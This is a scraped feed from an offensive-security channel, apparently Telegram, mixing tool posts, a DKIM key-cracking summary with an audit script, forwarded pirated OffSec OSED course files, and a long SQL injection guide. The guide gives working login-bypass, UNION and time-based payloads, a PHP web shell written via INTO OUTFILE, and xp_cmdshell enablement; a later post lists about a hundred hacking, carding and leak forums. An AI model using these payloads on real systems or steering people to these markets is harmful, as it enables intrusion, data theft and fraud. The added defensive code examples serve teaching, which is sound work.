reconcore
#pentest #vulnerability #research #malware #analysis #redteam #blueteam #tools #cve #rce #lpe

#offensivesecurity #methods #technique

The channel does not call for any action.
The posts are taken from public sources.
@reconcore is not responsible.
Forensics: an overview of tooling and training platforms
Forensics (computer forensics, cybercrime investigation) is an applied discipline concerned with solving crimes that involve computer data: examining digital evidence, and the methods of finding, acquiring and preserving it. This article reviews popular tools for forensic analysis and digital evidence collection.

#forensics
How We Cracked a 512-Bit DKIM Key for Less Than $8 in the Cloud

A step-by-step guide to recovering the private key from weak (<1024-bit) DKIM public keys (spoiler: cheaply and quickly). Once you have it, you can send mail that passes DKIM as if you were the legitimate owner of someone else's domain.

In the article the authors recovered the signing key for a redfin.com selector and sent signed mail to several providers; Yahoo, Mailfence and Tuta accepted the signature.
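A quick way to check your own selectors for the weak keys the article factors, as an added example (my code, not the article's): it parses a DKIM TXT record, walks the DER of the p= public key with the standard library only, and flags RSA moduli shorter than 1024 bits. The two records are constructed inline; their moduli are not real RSA keys, just integers of the right length, which is all the length check reads. Fetching the live record (dig TXT selector._domainkey.example.com) is left to the caller.

```python
import base64
import re

# ---- minimal DER helpers (stdlib only, so the check runs without `cryptography`) ----
RSA_OID = bytes.fromhex("06092a864886f70d010101")  # OID 1.2.840.113549.1.1.1 rsaEncryption

def _der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(body)) + body

def _der_int(v: int) -> bytes:
    body = v.to_bytes(max(1, (v.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:            # DER INTEGER is signed: pad so the value stays positive
        body = b"\x00" + body
    return _tlv(0x02, body)

def _read_tlv(buf: bytes, pos: int = 0):
    """Return (tag, body, next_pos) for the TLV that starts at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                 # long-form length
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def encode_rsa_spki(n: int, e: int = 65537) -> bytes:
    """SubjectPublicKeyInfo DER: the structure a DKIM p= tag carries, base64-encoded."""
    rsa_pub = _tlv(0x30, _der_int(n) + _der_int(e))            # RSAPublicKey
    alg_id = _tlv(0x30, RSA_OID + b"\x05\x00")                   # AlgorithmIdentifier
    return _tlv(0x30, alg_id + _tlv(0x03, b"\x00" + rsa_pub))   # BIT STRING, 0 unused bits

def rsa_modulus_bits(spki: bytes) -> int:
    tag, outer, _ = _read_tlv(spki)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, alg_id, pos = _read_tlv(outer)
    if not alg_id.startswith(RSA_OID):
        raise ValueError("not an rsaEncryption key")
    _, bitstr, _ = _read_tlv(outer, pos)
    _, rsa_pub, _ = _read_tlv(bitstr[1:])    # skip the unused-bits byte
    _, n_bytes, _ = _read_tlv(rsa_pub)       # first INTEGER is the modulus
    return int.from_bytes(n_bytes, "big").bit_length()

# ---- DKIM record handling ----
def parse_dkim_record(txt: str) -> dict:
    """'v=DKIM1; k=rsa; p=MIG...' -> {'v': 'DKIM1', 'k': 'rsa', 'p': 'MIG...'}.
    Whitespace inside values is dropped (long p= values are usually split across strings)."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip()] = re.sub(r"\s+", "", v)
    return tags

def audit_dkim_record(txt: str, min_bits: int = 1024) -> tuple:
    """Return (modulus_bits, is_weak). Raises on non-RSA keys and revoked (empty p=) records."""
    tags = parse_dkim_record(txt)
    if tags.get("k", "rsa") != "rsa":
        raise ValueError("unsupported key type: " + tags["k"])
    if not tags.get("p"):
        raise ValueError("selector is revoked (empty p=)")
    bits = rsa_modulus_bits(base64.b64decode(tags["p"]))
    return bits, bits < min_bits

# Constructed sample records. The moduli are NOT real RSA keys (not a product of two
# primes); they only have the right bit length, which is all the audit reads.
def _sample_record(bits: int) -> str:
    n = (1 << (bits - 1)) | 0x1235
    return "v=DKIM1; k=rsa; p=" + base64.b64encode(encode_rsa_spki(n)).decode()

WEAK_RECORD = _sample_record(512)
STRONG_RECORD = _sample_record(2048)

if __name__ == "__main__":
    for name, rec in (("weak", WEAK_RECORD), ("strong", STRONG_RECORD)):
        print(name, audit_dkim_record(rec))
```

RFC 8301 makes 1024 bits the floor that verifiers must enforce; the article's point is that some providers still accept signatures from shorter keys. Records with k=ed25519 are rejected here rather than measured, and an empty p= means the selector was revoked, which is the right end state for a retired weak key.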
Nuclei templates for #drupal vulnerabilities

Github: Link
How to use Nuclei templates?
nuclei -t ./nuclei-drupal-sa/templates/ --target https://www.example.com


#CyberSecurity #bugbounty #Nuclei #infosec
Vidar stealer: an extremely detailed reverse engineering of the beast.

Link
#OffSec | EXP-301: Windows User Mode Exploit Development (OSED Certification)

Windows User Mode Exploit Development (EXP-301) is a course that teaches learners the basics of modern exploit development. Despite being a fundamental course, it is at the 300 level because it relies on substantial knowledge of assembly and low level programming. It begins with basic buffer overflow attacks and builds into learning the skills needed to crack the critical security mitigations protecting enterprises.
Forwarded from @GlobalRedHat
EXP-301 OSED.pdf
8.6 MB
- OSED - EXP-301.PDF
Forwarded from @GlobalRedHat
EXP301 OSED Exploit Development - EXP301 Videos PDF.zip
2.2 GB
- OSED - EXP-301. Videos + PDF
/dump/
resym-ccs24.pdf
🐙 resym
"ReSym: Harnessing LLMs to Recover Variable and Data Structure Symbols from Stripped Binaries" by Danning Xie, Zhuo Zhang, Nan Jiang, Xiangzhe Xu, Lin Tan, and Xiangyu Zhang.
Commix v4.0-stable

UPD. Major update to the 4.0 branch

An all-in-one tool for exploiting command injection vulnerabilities, written in Python. Commands, flags, output and everything else closely follow SQLMap.

Preinstalled in Kali (available simply as commix).

Install:
git clone https://github.com/commixproject/commix.git commix
python commix.py -h


Beginner ("wizard") mode:
python commix.py --wizard


Normal run:
python commix.py -u http://62.173.140.174:16016/ --data 'action='


Tamper script support:
python commix.py -u http://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs


List tamper scripts:
python commix.py --list-tampers

Download
Usage examples

#commix
#python #pentest #soft
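To make the tamper option concrete, here is an added example (my code, not Commix's) of the bug class Commix exploits, beside a hardened version: a lookup that splices user input into a shell command behind a space-stripping filter, a space2ifs-style transform that gets an injected command through that filter, and a fix that allowlists the value and passes it as a separate argv element. The service, the filter and the inputs are constructed for the demo and assume a POSIX sh.

```python
import re
import subprocess

def naive_filter(user_input: str) -> str:
    """A typical broken 'sanitizer': strips spaces but leaves ; | $ ( ) intact."""
    return user_input.replace(" ", "")

def space2ifs(payload: str) -> str:
    """What Commix's space2ifs tamper does: replace spaces with ${IFS}. sh expands
    ${IFS} to whitespace and field-splits on it, so 'echo${IFS}X' runs 'echo X'."""
    return payload.replace(" ", "${IFS}")

def lookup_vulnerable(host: str) -> str:
    """Vulnerable (constructed): user input is spliced into a shell command line.
    The filter stops 'x;echo PWNED' but not 'x;echo${IFS}PWNED'."""
    cmd = "echo lookup=" + naive_filter(host)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")

def lookup_safe(host: str) -> str:
    """Hardened: allowlist the value, then hand it over as its own argv element.
    No shell parses it, so metacharacters are just bytes inside one argument."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("host must be a hostname or IP literal")
    return subprocess.run(["echo", "lookup=" + host],
                          capture_output=True, text=True).stdout

if __name__ == "__main__":
    payload = "8.8.8.8;echo PWNED"
    print("filtered, plain  :", repr(lookup_vulnerable(payload)))
    print("filtered, tampered:", repr(lookup_vulnerable(space2ifs(payload))))
    print("hardened         :", repr(lookup_safe("8.8.8.8")))
```

The argv form alone already removes shell injection; the allowlist matters for the other half of the problem, argument injection (a value beginning with `-` that the invoked program reads as an option), which argv does not prevent.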
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi

SQL Injection (SQLi) is one of the most critical web vulnerabilities: it lets an attacker alter the queries an application sends to its database, extract sensitive data, modify records and, in some database configurations, execute commands on the database host (Remote Code Execution, RCE).


This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.


━━━━━━━━━━━━━━━━

1. Discovering SQL Injection Vulnerabilities in Multiple Ways


🔹Method 1: Manual Testing with Special Characters

The simplest way to test for SQL Injection is by inserting special characters such as:

'
"
--
#
;


Example 1: Injecting a Single Quote

'

If a website has a login page like:

https://example.com/login.php?user=admin

Try entering:

https://example.com/login.php?user=admin'

If an error appears like:

You have an error in your SQL syntax...

A database error echoed back like this shows that the quote reached the query parser unescaped, a strong sign of an injectable parameter (error-based SQLi). The absence of an error proves nothing, since production applications usually suppress them; fall back to the blind technique in Method 4.


━━━━━━━━━━━━━━━━
🔹Method 2: Injecting Simple SQL Queries

If the backend SQL query looks like this:

SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:

admin' --

or

' OR '1'='1' --

If you are logged in without a valid password, the application is vulnerable: the closing quote ends the string and -- comments out the rest of the query, password check included. In MySQL the -- comment must be followed by a space (-- ), and # works there as well.


━━━━━━━━━━━━━━━━━
🔹 Method 3: Using SQLMap for Automated Testing

🔹 SQLMap is a powerful tool for automated SQL Injection detection. Run:


sqlmap -u "https://example.com/login.php?user=admin" --dbs

SQLMap tests each parameter with boolean-, error-, UNION-, stacked- and time-based techniques and, once one is confirmed injectable, --dbs enumerates the database names. Useful additions: -p user to target a single parameter, --batch to accept the defaults non-interactively, and --level / --risk to widen the payload set.


━━━━━━━━━━━━━━━━━
🔹Method 4: Testing with SQL Sleep (Time-Based SQLi)

If error messages are hidden, you can test for Time-Based (blind) SQLi by making the database pause:

https://example.com/page?id=1' AND SLEEP(5)-- -

If the page consistently takes about 5 seconds longer to load, the parameter is likely injectable. SLEEP() is MySQL syntax; use pg_sleep(5) on PostgreSQL and WAITFOR DELAY '0:0:5' (as a stacked query) on SQL Server. Repeat with a different delay (e.g. 10) to rule out ordinary latency, and note that a trailing space after -- is lost in a URL, hence the -- - form (--+ or %23 also work on MySQL).


━━━━━━━━━━━━━━━━━
🔹Method 5: Data Extraction via UNION-Based SQL Injection

If a website displays data from a database, try appending a UNION SELECT with the same number of columns as the original query (find the count by incrementing ORDER BY n until it errors, or by adding values until the UNION stops failing):

https://example.com/page?id=1 UNION SELECT 1,2,3,4-- -


If some of the numbers show up in the page, those positions are reflected: replace them with expressions such as version(), user(), database() or a column from information_schema to pull data out.


━━━━━━━━━━━━━━━
2. Escalating SQL Injection to RCE (Remote Code Execution)

If the injection point can reach the database's file-writing features, you can drop a file into the web root and turn SQLi into code execution. On MySQL this is SELECT ... INTO OUTFILE, and it only works when the database user has the FILE privilege, secure_file_priv is empty (modern installs default it to a restricted directory or NULL, which disables this entirely) and the database runs on the same host as the web server with a writable document root. LOAD_FILE() is the read-side counterpart, useful for reading configuration files rather than for execution.

🔹Example: Uploading a Web Shell via SQLi

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

From a UNION-based injection point with four columns the same write looks like this (URL-encode as needed):

https://example.com/page?id=1 UNION SELECT "<?php system($_GET['cmd']); ?>",2,3,4 INTO OUTFILE '/var/www/html/shell.php'-- -

Now, access the shell through:

http://target.com/shell.php?cmd=whoami


🔹On Microsoft SQL Server, if xp_cmdshell is enabled (it is disabled by default; turning it on needs sysadmin rights and a stacked-query injection point), execute system commands like:

EXEC xp_cmdshell 'whoami';

A sysadmin-level injection can switch it on first:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;


This returns the account the SQL Server service runs as, which is the privilege level every command launched this way inherits.

━━━━━━━━━━━━━━━
3. Exploiting SQL Injection to Gain Admin Access

In some cases, SQLi can be used to escalate privileges by modifying user records. This needs a write-capable injection, usually stacked queries ('; UPDATE ... -- ), which not every database driver allows:

UPDATE users SET is_admin = 1 WHERE username = 'victim';

Or read an admin's session or password-reset token, if the application keeps those in a table reachable from the injection point (for example via a UNION SELECT):

SELECT session_id FROM users WHERE username = 'admin';


💡 Conclusion


•Test manually using ' and OR 1=1

•Use SQLMap for automatic SQLi detection

•Escalate SQLi to RCE if the system allows file operations

•Test SQL Sleep (Time-Based Injection) for hidden errors

•Use UNION SELECT to extract sensitive data


#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
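The detection and bypass steps above, run end to end against an in-memory SQLite database so they can be tried offline, as an added example that is not part of the article: the quote probe (Method 1), the login bypasses (Method 2), UNION extraction across tables (Method 5), and the parameterized versions that stop all three. The schema, rows and the products lookup are constructed for the demo; SQLite has no SLEEP() or INTO OUTFILE, so Method 4 and the RCE step are not modelled here.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample schema and rows (not from the article)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT, is_admin INTEGER);
        INSERT INTO users VALUES (1, 'admin', 's3cret!', 1), (2, 'bob', 'hunter2', 0);
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
    """)
    return con

def login_vulnerable(con, user: str, pw: str):
    # The article's query built by string concatenation: input becomes SQL.
    q = f"SELECT username FROM users WHERE username = '{user}' AND password = '{pw}'"
    return con.execute(q).fetchone()

def login_safe(con, user: str, pw: str):
    # Parameterized: the values are bound as data and never reach the SQL parser.
    q = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(q, (user, pw)).fetchone()

def probe_error(con, user: str) -> bool:
    """Method 1: does a stray quote break the statement? True means the input
    is parsed as SQL (an error-based signal)."""
    try:
        login_vulnerable(con, user, "x")
        return False
    except sqlite3.OperationalError:
        return True

def product_vulnerable(con, pid: str):
    # Numeric context, no quotes at all, so a UNION can be appended directly.
    return con.execute(f"SELECT id, name, price FROM products WHERE id = {pid}").fetchall()

def product_safe(con, pid: str):
    # Validate the shape, then bind: '1 UNION SELECT ...' never becomes a query.
    if not pid.isdigit():
        raise ValueError("id must be an integer")
    return con.execute("SELECT id, name, price FROM products WHERE id = ?",
                       (int(pid),)).fetchall()

if __name__ == "__main__":
    con = make_db()
    print("quote probe       :", probe_error(con, "admin'"))
    print("admin' --         :", login_vulnerable(con, "admin' --", "wrong"))
    print("' OR '1'='1' --   :", login_vulnerable(con, "' OR '1'='1' --", "wrong"))
    print("safe, same payload:", login_safe(con, "' OR '1'='1' --", "wrong"))
    print("UNION extraction  :", product_vulnerable(
        con, "1 UNION SELECT id, username, password FROM users"))
```

SQLite accepts a bare -- as a comment, which is why the payloads work exactly as written; against MySQL the same strings need the trailing space (-- ) or # noted under Method 2.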
HACKING FORUMS (some may no longer work).
0x00sec – https://0x00sec.org
Alligator – https://alligator.cash
Altenen Forums – https://altenens.is
Antichat – https://forum.antichat.com
ASCarding – https://ascarding.com
Black Hat Pro Tools – https://www.blackhatprotools.info
BreachForums – https://breachforums.st
Carder Forum Online – https://carder-forum.online
Carding Forum – https://cardingforum.cx
Carding Leaks – https://cardingleaks.ws
CardVilla – https://cardvilla.cc
Chitachok – https://chitachok.fun
Combolist – https://combolist.top
Cracked – https://cracked.io
Crackia – https://crackia.com
Cracking – https://cracking.org
Crackingall – https://crackingall.com
Cracking Hits – https://crackinghits.to
Cracking Italy – https://crackingitaly.to
Cracking X – https://crackingx.com
Cracking Pro – https://www.crackingpro.com
Crackingshare – https://crackingshare.com
Crackx – https://crackx.to
Crimenetwork – https://crime.to
CrdCrew – https://crdcrew.cc
CrdPro – https://crdpro.cc
CWEB Carding Forum – https://www.cweb.ws
CyberForum RU – https://www.cyberforum.ru
Cyber Leaks – https://cyberleaks.to
Cyber Nulled – https://cybernulled.com
DarkPro – https://darkpro.net
DarkStash – https://darkstash.com
Dark-Time – https://srv2.dark-time.life
Darkweb Mafias – https://darkwebmafias.ws
Demon Forums – https://www.demonforums.net
DirectLeaks – https://directleaks.to
DrDark – https://drdark.ru
ELeaks – https://eleaks.to
Enclave – https://www.enclave.cc
Eternia – https://eternia.to
Exetools – https://forum.exetools.com
Exploit.in – https://exploit.in
EzCarder – https://ezcarder.cc
ForumTeamSite – https://forumteam.site
FSSquad – https://fssquad.com
Ghostlyhaks – https://ghostlyhaks.com/forum
Go4Expert – https://www.go4expert.com/forums
Greekhacking – https://greekhacking.gr
Hack Forums – https://hackforums.net
Hacking Father – https://hackingfather.com
Hackonology – https://hackonology.com/forum
Hack Seller – https://hackseller.com
HacksTurkey – https://hacksturkey.com
Happy Hack – http://happy-hack.net/board
Hide01 Forums – https://forums.hide01.ir
High-Minded – https://high-minded.net
Indetectables – https://indetectables.net/index.php
Iran-Cyber – https://iran-cyber.net/forums
Kuketz Forum – https://forum.kuketz-blog.de
Leak Forum – https://leakforum.org
Leak Zone – https://leakzone.net
Leaked BB – https://leakedbb.com
Leech – https://leech.is
Legit Carder – https://legitcarder.ru
LegitCarders – https://legitcarders.ws
Lolz Guru – https://lolz.guru
MaulTalk – https://www.maultalk.com
Memory Hackers – https://memoryhackers.org
Niflheim – https://niflheim.top
Noirth – https://noirth.com
Nsane Forums – https://nsaneforums.com
Null Cracker – https://nullcrack.store
Nulled – https://www.nulled.to
Nulled.Id – https://nulled.id
Pegasus Hack Team – https://pegasushackteam.com
Psylab – https://psylab.cc
Openssource – https://www.openssource.info
P0wersurge – https://p0wersurge.com/forums
ProLogic – https://prologic.su
R10 – https://www.r10.net
Reteam – http://reteam.org/board
ROM Hacking – https://www.romhacking.net/forum
RST Forums – https://rstforums.com/forum
Russian Carder – https://russiancarder.net
Seopirat – https://www.seopirat.club
Shield Forum – https://shieldforum.in
Sinful Site – https://sinfulsite.com
Sinisterly – https://sinister.ly
SoldierX – https://www.soldierx.com/bbs
SzeneBox – https://www.szenebox.org
TrainingCircle – https://trainingcircle.in
Trusted Sellers – https://trustedsellers.ws
TurkHacks – https://www.turkhacks.com
Underc0de – https://underc0de.org/foro
UnderWorldMafias – https://underworldmafias.net
Valid Market – https://www.validmarket.io
Verified Carder – https://www.verifiedcarder.net
VLMI – https://vlmi.ws
Webmasters – http://webmasters.ru/forum
Wilders Security – https://www.wilderssecurity.com
Xaker.Name Team – https://xak.guru
XSS.is – https://xss.is
YouHack – https://www.youhack.ru
Forwarded from Kaon (NGC6537)
ANSSI and FBI hack into C2 server to remove PlugX malware

A French law enforcement agency has gained access to the C2 server assigned IP address 45.142.166.112. [...] Working with the French law enforcement agency, the FBI can send the self-delete command to the TARGET DEVICES infected with this variant of PlugX malware. [...] The requested warrant was previously issued on August 28, 2024 and has been reissued on a rolling basis since then. The FBI has counted the daily number of TARGET DEVICES that communicated with the C2 server and were sent the command to self-delete the PlugX malware. As of December 17, 2024, the self-delete command has been sent to thousands of unique IP addresses, with a consistent rate of disinfection.
For 5 months, the FBI has been using Mustang Panda's C2 server, which was hacked by a "French law enforcement agency" (ANSSI), to remove malware from American computers using commands sent via said C2 server.

Link: https://www.justice.gov/opa/pr/justice-department-and-fbi-conduct-international-operation-delete-malware-used-china-backed
Forwarded from Kaon (NGC6537)
New Anonfile Domain: https://anonfile.la/
🔥 Learn Ethical Hacking Full Course in 10 Hours [Beginners to Advanced] 🔥
SQL Injection Complete Guide
How to Access Phone's SMS Remotely
Most Common terms in Cyber Security
Hack Databases With Metasploit